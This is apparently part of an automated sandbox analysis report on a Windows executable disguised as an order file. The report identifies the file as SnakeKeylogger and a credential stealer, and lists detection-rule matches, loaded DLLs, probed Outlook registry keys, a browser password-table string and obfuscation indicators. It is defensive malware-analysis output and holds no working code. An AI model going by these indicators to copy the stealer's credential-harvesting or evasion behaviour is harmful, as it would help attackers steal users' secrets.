Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127A088 3_2_0127A088
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_01275362 3_2_01275362
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127D2CA 3_2_0127D2CA
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127D599 3_2_0127D599
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127C468 3_2_0127C468
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127C738 3_2_0127C738
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_012769A0 3_2_012769A0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_012729E0 3_2_012729E0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127CD28 3_2_0127CD28
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127EC18 3_2_0127EC18
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127CFF7 3_2_0127CFF7
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_01276FC8 3_2_01276FC8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127F7F1 3_2_0127F7F1
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127EC0A 3_2_0127EC0A
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127FC48 3_2_0127FC48
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_01273E09 3_2_01273E09
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A397B0 3_2_05A397B0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A35290 3_2_05A35290
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A39ED8 3_2_05A39ED8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F1B9 3_2_05A3F1B9
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A39590 3_2_05A39590
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A38DF9 3_2_05A38DF9
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F1C8 3_2_05A3F1C8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E908 3_2_05A3E908
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E918 3_2_05A3E918
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A32970 3_2_05A32970
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3ED70 3_2_05A3ED70
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E4B3 3_2_05A3E4B3
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E4C0 3_2_05A3E4C0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30023 3_2_05A30023
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3DC01 3_2_05A3DC01
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3DC10 3_2_05A3DC10
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E068 3_2_05A3E068
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30040 3_2_05A30040
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E059 3_2_05A3E059
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A31BA8 3_2_05A31BA8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3D7B8 3_2_05A3D7B8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A31B97 3_2_05A31B97
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30B20 3_2_05A30B20
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30B30 3_2_05A30B30
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3CF08 3_2_05A3CF08
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3D360 3_2_05A3D360
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A35280 3_2_05A35280
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A32288 3_2_05A32288
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F620 3_2_05A3F620
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A38E08 3_2_05A38E08
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F610 3_2_05A3F610
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3FA6B 3_2_05A3FA6B
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A39E69 3_2_05A39E69
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3FA78 3_2_05A3FA78
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A32278 3_2_05A32278
Source: new order 00041221.exe, 00000001.00000002.1269553878.000000000079E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1278242473.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271292903.0000000002851000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271292903.00000000028AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1277540501.0000000004E00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000000.1238190903.0000000000338000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe, 00000003.00000002.3708230795.00000000010F7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs new order 00041221.exe
Source: new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe Binary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
Source: new order 00041221.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: new order 00041221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -A.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -A.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.SetAccessControl
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.AddAccessRule
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.SetAccessControl
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.AddAccessRule
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@6/4
Source: C:\Users\user\Desktop\new order 00041221.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order 00041221.exe.log
Source: C:\Users\user\Desktop\new order 00041221.exe Mutant created: NULL
Source: C:\Users\user\Desktop\new order 00041221.exe Mutant created: \Sessions\1\BaseNamedObjects\EcCdSAIhNcVisQpsLrNIP
Source: new order 00041221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: new order 00041221.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\new order 00041221.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000318D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000315B000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000313D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000314D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003180000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: new order 00041221.exe Virustotal: Detection: 41%
Source: new order 00041221.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
Source: C:\Users\user\Desktop\new order 00041221.exe Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
Source: C:\Users\user\Desktop\new order 00041221.exe Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\new order 00041221.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: new order 00041221.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: new order 00041221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, PingPong.cs .Net Code: Justy
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs .Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs .Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_00B50995 push es; retf 1_2_00B50996
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_00B50990 push es; retf 1_2_00B50992
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_00B50998 push es; retf 1_2_00B5099A
Source: new order 00041221.exe Static PE information: section name: .text entropy: 7.869956261157549
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WEkErVgJn1PjkdRbDK.cs High entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.cs High entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs High entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, oea08sDOxeGOQEPJMl.cs High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, XmPheVJY4ysEIwXRAO.cs High entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, mbWDZh1fAEZLVbsgfE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, I7YwgKocvwlhG6qbjf.cs High entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, PIIQJlCPLLSpQvTcKh.cs High entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GYgZrNuv1RLjrByTBp.cs High entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
